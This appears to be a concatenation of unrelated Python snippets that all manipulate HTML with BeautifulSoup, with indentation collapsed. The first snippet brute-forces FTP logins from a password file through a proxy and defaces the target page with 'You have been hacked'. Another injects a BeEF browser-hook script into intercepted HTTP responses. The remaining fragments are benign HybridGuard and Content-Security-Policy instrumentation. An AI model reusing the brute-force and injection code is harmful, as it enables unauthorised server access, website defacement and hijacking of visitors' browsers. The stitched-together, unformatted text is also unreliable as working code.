def change_data_file(self, login_to_server, ip, file_name, ): self.login_to_server = login_to_server # self.pas_for_ftp = pas_for_ftp self.ip = ip self.file_name = file_name file = "pasw.txt" br = Anon(useragent, proxies) pf = open(file, 'r') #open a password file for line in pf.readlines(): pas_for_ftp = line.strip('\r').strip('\n') try: print "login_to_server - ", self.login_to_server # print "pas_for_ftp - ", self.pas_for_ftp print "IP - ", self.ip print "file_name - ", self.file_name url = "ftp://" + self.login_to_server + ":" + pas_for_ftp + "@" + self.ip + "/" print url url2 = url + self.file_name print url2 response = br.open(url2) soup = BeautifulSoup(response.get_data()) b = soup.prettify() tag = soup.body tag.clear() soup = BeautifulSoup("<body></body>") original_tag = soup.body new_tag = soup.new_tag("p") original_tag.append(new_tag) tag = soup.p tag.string = "You have been hacked" a = soup.prettify() print "File on server: ", b print "File's change: ", a request = Request(url2, data=b) request.get_host() request.get_data() print "Done!" break # response = br.open(url2) # html = br.response().get_data().replace("</b>", "< /b>") # response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK") # br.set_response(response) # html = br.response().get_data().replace(b, a) # response = mechanize.make_response(html, [("Content-Type", "text/html")], url2 , 200, "OK") # br.set_response(response) # html2 = br.request().get_data().replace(b, a) # mechanize.request_host(html2) except: print "[*]password", pas_for_ftp, "is incorrect"
def get_script(): # note that vendor folder only exists after successful build with gulp preview_script_src = '/'.join([CLIENT_DIST_PATH, 'vendor', 'require.js']) print(preview_script_src) soup = BeautifulSoup() script = soup.new_tag('script') script['src'] = preview_script_src script['data-main'] = '/'.join([CLIENT_DIST_PATH, 'main']) script['type'] = 'text/javascript' return script
def response(self, flow): with decoded(flow.response): # Remove content encoding (gzip, ...) html = BeautifulSoup(flow.response.content) """ # To Allow CORS if "Content-Security-Policy" in flow.response.headers: del flow.response.headers["Content-Security-Policy"] """ if html.body: script = html.new_tag('script', src=self.urlhook) html.body.insert(0, script) flow.response.content = str(html) self.send_output.emit("[{}] Injected BeFF url hook...".format( self.Name))
# Write JS to a new file from datetime import datetime as d file_index += 1 curr_time = d.now().strftime('%d_%m_%Y_%H_%M_%S') inline_file_name = 'js/inline_'+ curr_time + '_'+str(file_index)+'.js' print ("-------------------------------------------------------------------------------------------------------") print ("Found some inline JS. Making a new file {} and including it in Hybrid Guard.\nCode in inline JS is:".format(inline_file_name)) print (''.join(script.contents)) print ("-------------------------------------------------------------------------------------------------------") with open(inline_file_name, 'w') as f: f.write(''.join([x.encode('utf-8').strip() for x in script.contents]) + '\n') hg_funcs.append(inline_file_name) script.decompose() hybrid_guard_js = "js/HybridGuard.js" new_tag = html_soup.new_tag("script", src=hybrid_guard_js) html_soup.head.append(new_tag) print ("Backing up {} to {}".format(args.input_html[0], 'original_' + args.input_html[0])) os.rename(args.input_html[0], 'original_' + args.input_html[0]) with open(args.input_html[0], 'w') as f: f.write(str(html_soup)) print("Copying HybridGuard.js and policy_config.json to js/ : {}".format(args.hybrid_guard_file[0])) shutil.copyfile(args.hybrid_guard_file[0], hybrid_guard_js) package_json_file = re.sub('HybridGuard.js', 'policy_config.json', args.hybrid_guard_file[0]) print("\nPackage_config.json path : {}".format(package_json_file)) shutil.copyfile(package_json_file, "js/policy_config.json") print ("Modifying Hybrid Guard file:{}".format(hybrid_guard_js)) with open(hybrid_guard_js) as f: hg_file_contents = f.readlines()
# # Write JS to a new file # from datetime import datetime as d # file_index += 1 # curr_time = d.now().strftime('%d_%m_%Y_%H_%M_%S') # inline_file_name = 'js\\inline_'+ curr_time + '_'+str(file_index)+'.js' # print ("-------------------------------------------------------------------------------------------------------") # print ("Found some inline JS. Making a new file {} and including it in Hybrid Guard.\nCode in inline JS is:".format(inline_file_name)) # print (''.join(script.contents)) # print ("-------------------------------------------------------------------------------------------------------") # with open(path_to_hybrid +"\\"+ inline_file_name, 'w', encoding='utf8') as f: # f.write(''.join([x.strip() for x in script.contents]) + '\n') # hg_funcs.append(inline_file_name.replace("\\","/")) # #delete the script tag from index.html # script.decompose() new_tag = html_soup.new_tag("script", src="js/HybridGuard.js") html_soup.head.append(new_tag) print ("Backing up {} to {}".format(input_html, input_html_splitted)) os.rename(input_html, input_html_splitted) with open(input_html, 'w', encoding="utf8") as f: f.write(str(html_soup)) print("Copying HybridGuard.js and policy_config.json to js/ : {}".format(HG_file_path)) shutil.copyfile(HG_file_path, hybrid_guard_js) package_json_file = re.sub('HybridGuard.js', 'policy_config.json', HG_file_path) print("\nPackage_config.json path : {}".format(package_json_file)) shutil.copyfile(package_json_file, path_to_hybrid + "\\js\\policy_config.json") print ("Modifying Hybrid Guard file:{}".format(hybrid_guard_js)) with open(hybrid_guard_js, 'r', encoding='utf8') as f: hg_file_contents = f.readlines()
curr_time = d.now().strftime('%d_%m_%Y_%H_%M_%s') if not os.path.isdir('./js'): os.makedirs('./js') inline_file_name = 'js/inline_' + curr_time + '.js' print( "Found some inline JS. Making a new file {} and including it in Hybrid Guard.\nCode in inline JS is:" .format(inline_file_name)) print(''.join(script.contents)) with open(inline_file_name, 'w') as f: f.write(''.join([x.strip() for x in script.contents]) + '\n') hg_funcs.append(inline_file_name) script.decompose() # Append Hybrid Guard script tag hg_script_tag = html_soup.new_tag('script', src="js/hybridGuard.js", type="text/javascript") html_soup.body.insert_before(hg_script_tag) print("Backing up {} to {}".format(args.input_html[0], 'original_' + args.input_html[0])) os.rename(args.input_html[0], 'original_' + args.input_html[0]) with open(args.input_html[0], 'w') as f: f.write(str(html_soup)) print("Modifying Hybrid Guard file:{}".format(args.hybrid_guard_file[0])) with open(args.hybrid_guard_file[0]) as f: hg_file_contents = f.readlines() last_index = hg_file_contents.index('})();\n') if not last_index:
import re js_whitelist = ['cordova', 'jQuery'] whitelist_pattern = re.compile('(' + '|'.join(js_whitelist) + ')', re.I) # print(whitelist_pattern) file_index=0 input_html_splitted = input_html.split("\\") path_to_hybrid = ("\\").join(input_html_splitted[:-1]) input_html_splitted[-1] = 'original_' + input_html_splitted[-1] input_html_splitted = ("\\").join(input_html_splitted) # pdb.set_trace() script_soup = BeautifulSoup('<meta http-equiv="Content-Security-Policy" content="default-src \'self\' data: gap: https://ssl.gstatic.com ;script-src \'self\' \'nonce-2726c7f26c\';style-src \'self\'; media-src * ; connect-src https://dry-meadow-56957.herokuapp.com ; ">','html.parser') # pdb.set_trace() html_soup.head.insert(1,script_soup) package_hg= ' var package_name="{}";\n' tag = html_soup.new_tag("script") tag.append(package_hg.format(path_to_hybrid.split("\\")[-3])) # tag.append(' document.addEventListener("securitypolicyviolation", (e) => {\n') # tag.append('if(e.violatedDirective != "style-src-attr" && e.violatedDirective != "style-src-elem"){\n') # tag.append('alert(e.blockedURI);\n') # tag.append('alert(e.violatedDirective);\n') # tag.append('alert(e.originalPolicy);\n') # tag.append('xhttp.open("POST", "https://dry-meadow-56957.herokuapp.com/log_csp_data?appname="+package_name+"&errors="+e.violatedDirective+":"+e.blockedURI+", true);\n') # tag.append("xhttp.send();\n") # tag.append(';} } )\n') tag.append('var listofErrors = []\n') tag.append('document.addEventListener("securitypolicyviolation", (e) => {\n') tag.append('if (e.violatedDirective != "style-src-attr" && e.violatedDirective != "style-src-elem"){\n') tag.append('listofErrors.push(encodeURI(e.violatedDirective)+":"+encodeURI(e.blockedURI))\n') tag.append('}\n') tag.append('})\n')